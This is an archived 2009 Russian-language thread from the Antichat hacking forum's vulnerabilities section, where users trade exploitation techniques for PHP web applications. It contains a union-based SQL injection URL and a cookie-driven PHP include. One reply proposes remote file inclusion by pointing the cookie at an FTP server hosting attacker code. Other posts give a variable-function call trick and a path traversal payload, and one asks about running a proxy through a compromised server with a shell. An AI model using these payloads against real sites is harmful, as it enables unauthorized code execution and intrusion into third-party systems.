HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9421  
Старый 17.10.2009, 13:10
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию

Цитата:
Сообщение от Byrger  
Привет есть стандартная инъекция в MySQL вида:
site.ru/index.php?id=1+union+select+1,2,3,4,5--+
Возможно ли сделать UPDATE или INSERT в базу?
нет
 
Ответить с цитированием

  #9422  
Старый 17.10.2009, 15:59
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Возможно ли сделать прокси из сервера на котором есть шелл?
Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
 
Ответить с цитированием

  #9423  
Старый 17.10.2009, 16:09
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
С нами: 9069748

Репутация: 438
По умолчанию

Цитата:
Сообщение от Byrger  
Возможно ли сделать прокси из сервера на котором есть шелл?
Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
https://forum.antichat.ru/thread93318.html
 
Ответить с цитированием

  #9424  
Старый 17.10.2009, 16:21
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд:
PHP код:
if(is_dir($_COOKIE['skin']))
include(
$_COOKIE['skin'].'/template.php'); 
Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.

Последний раз редактировалось mailbrush; 17.10.2009 в 16:26..
 
Ответить с цитированием

  #9425  
Старый 17.10.2009, 16:42
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Rezak  
Где-то видел тут на античате тему про, то как делать эксплоит скрипта типа
PHP код:
<? $a($b); ?>
он юзается примерно так: test.php?a=phpinfo&b=32
вот и подумал может с классами также можно извратиться.

P.S. Это к сообщению про вот этот скрипт
PHP код:
<?
$template
->set_filenames(array('head'=>"$template_path/header.html"));
$template->pparse('head');
?>
Это можно замутить если тока register_globals = on
в php.ini
 
Ответить с цитированием

  #9426  
Старый 17.10.2009, 16:58
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от mailbrush  
Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд:
PHP код:
if(is_dir($_COOKIE['skin']))
include(
$_COOKIE['skin'].'/template.php'); 
Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.
Там RFI
Cookie: skin=ftp://vasya:tapochkin@ftp.narod.ru/

ну а на фтпшнике соответственно файл template.php
+ "Начиная с PHP 5.0.0, эта функция также может быть использована с некоторыми упаковщиками url."
==
Если интересует именно LFI произвольного файла, то врятли

Последний раз редактировалось jokester; 17.10.2009 в 17:12..
 
Ответить с цитированием

  #9427  
Старый 17.10.2009, 17:03
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

Цитата:
Сообщение от Ctacok  
Это можно замутить если тока register_globals = on
в php.ini
Покажи как. Вот как раз для случая с
Код:
$template->set_filenames(array('head'=>"$template_path/header.html"));
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #9428  
Старый 17.10.2009, 17:18
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Qwazar  
Покажи как. Вот как раз для случая с
Код:
$template->set_filenames(array('head'=>"$template_path/header.html"));
PHP код:
file.php?template=../index.php%0D 
Ну а я вообщем то говорил про первый пример, так что строго не судите
 
Ответить с цитированием

  #9429  
Старый 17.10.2009, 17:34
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от Ctacok  
PHP код:
file.php?template=../index.php%0D 
Ну а я вообщем то говорил про первый пример, так что строго не судите
Не будет работать, ибо глобальные массивы будут регистрироваться вначале скрипта, а после будет идти инклюд конфига какого-то, и $template заменится.

jokester, спасибо. Это мой код, т.е. исходников я палить не хотел, ибо там названия классов / ф-ция выдает двиг. В исходнике движка есть еще префикс dirname(__FILE__), т.е. папка тек. файла. Значит никак Спасибо еще раз... Значит можно добиться только расскрытия...

Последний раз редактировалось mailbrush; 17.10.2009 в 18:06..
 
Ответить с цитированием

  #9430  
Старый 17.10.2009, 17:46
Rezak
Новичок
Регистрация: 25.01.2008
Сообщений: 5
С нами: 9628417

Репутация: 2
По умолчанию

Цитата:
Сообщение от Ctacok  
PHP код:
file.php?template=../index.php%0D 
Ну а я вообщем то говорил про первый пример, так что строго не судите
С первым то все понятно, работает как часы

А вот этот скрипт он именно такой короткий и есть
PHP код:
$template->set_filenames(array('head'=>"$template_path/header.html")); 
Просто он написан для того чтобы его инклудить в файл в котором класс template задан уже, но по глупости авторов к этому скрипту есть прямой доступ.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...